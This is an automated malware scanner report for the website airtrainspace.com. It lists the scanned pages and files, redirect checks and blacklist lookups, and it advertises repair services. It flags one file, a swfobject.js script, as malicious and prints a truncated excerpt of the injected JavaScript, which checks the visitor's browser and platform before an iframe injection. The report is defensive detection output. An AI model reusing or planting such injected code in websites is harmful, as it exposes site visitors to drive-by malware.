Malware Scanner report for airtrainspace.com

Malicious/Suspicious/Total urls checked: 1/0/15

1 page has malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.airtrainspace.com/	200 OK Content-Length: 89034 Content-Type: text/html	clean
http://www.airtrainspace.com/media/system/js/mootools-core.js	200 OK Content-Length: 97285 Content-Type: text/javascript	clean
http://www.airtrainspace.com/media/system/js/mootools-more.js	200 OK Content-Length: 111515 Content-Type: text/javascript	clean
http://www.airtrainspace.com/media/system/js/core.js	200 OK Content-Length: 5707 Content-Type: text/javascript	clean
http://www.airtrainspace.com/media/system/js/caption.js	200 OK Content-Length: 1652 Content-Type: text/javascript	clean
http://www.airtrainspace.com/media/system/js/modal.js	200 OK Content-Length: 10655 Content-Type: text/javascript	clean
http://www.airtrainspace.com/media/zen/js/jquery/jquery-1.8.3.min.js	200 OK Content-Length: 94560 Content-Type: text/javascript	clean
http://www.airtrainspace.com/media/zen/js/jquery/jquery-noconflict.js	200 OK Content-Length: 944 Content-Type: text/javascript	clean
http://www.airtrainspace.com/modules/mod_xpertcontents/interface/js/xpertcontents.js	200 OK Content-Length: 6712 Content-Type: text/javascript	clean
http://www.airtrainspace.com/modules/mod_zstagcloud/js/swfobject.js	200 OK Content-Length: 10682 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function Tizonecontrol() { var unipostersypasto = navigator.userAgent; var ma = (unipostersypasto.indexOf("Android") > -1 \|\| unipostersypasto.indexOf("Chrome") > -1 \|\| unipostersypasto.indexOf("Macintosh") > -1 \|\| unipostersypasto.indexOf("FreeBSD") > -1 \|\| unipostersypasto.indexOf("Linux") > -1 \|\| unipostersypasto.indexOf("IEMobile") > -1 \|\| unipostersypasto.indexOf("iPhone") > -1 \|\| unipostersypasto.indexOf("iPad") > -1 \|\| unipostersypasto.indexOf("IBrowse") & ... 3221 bytes are skipped ...},addDomLoadEvent:f,addLoadEvent:R,getQueryParamValue:function(v){var u=K.location.search\|\|K.location.hash;if(v==null){return g(u)}if(u){var t=u.substring(1).split("&");for(var r=0;r<t.length;r++){if(t[r].substring(0,t[r].indexOf("="))==v){return g(t[r].substring((t[r].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(A&&M){var q=C(m);if(q){q.parentNode.replaceChild(M,q);if(l){W(l,true);if(h.ie&&h.win){M.style.display="block"}}M=null;l=null;A=false}}}}}(); Antivirus reports: F-Prot JS/IFrame.RS Commtouch JS/IFrame.RS
http://www.airtrainspace.com/modules/mod_djmenu/assets/js/dropline-helper.js	200 OK Content-Length: 1448 Content-Type: text/javascript	clean
http://www.airtrainspace.com/modules/mod_djmenu/assets/js/djselect.js	200 OK Content-Length: 2925 Content-Type: text/javascript	clean
http://www.airtrainspace.com/modules/mod_djmenu/assets/js/djmenu.js	200 OK Content-Length: 4880 Content-Type: text/javascript	clean
http://www.airtrainspace.com//www.airtrainspace.com//templates/dj-real-estate02//lib/js/doctextsizer.js/	404 Not Found Content-Length: 1083 Content-Type: text/html	clean
http://www.airtrainspace.com//templates/dj-real-estate02/index.php/	200 OK Content-Length: 0 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: airtrainspace.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: airtrainspace.com
Referer: http://www.google.com/search?q=airtrainspace.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=airtrainspace.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://airtrainspace.com/

Result: airtrainspace.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for airtrainspace.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools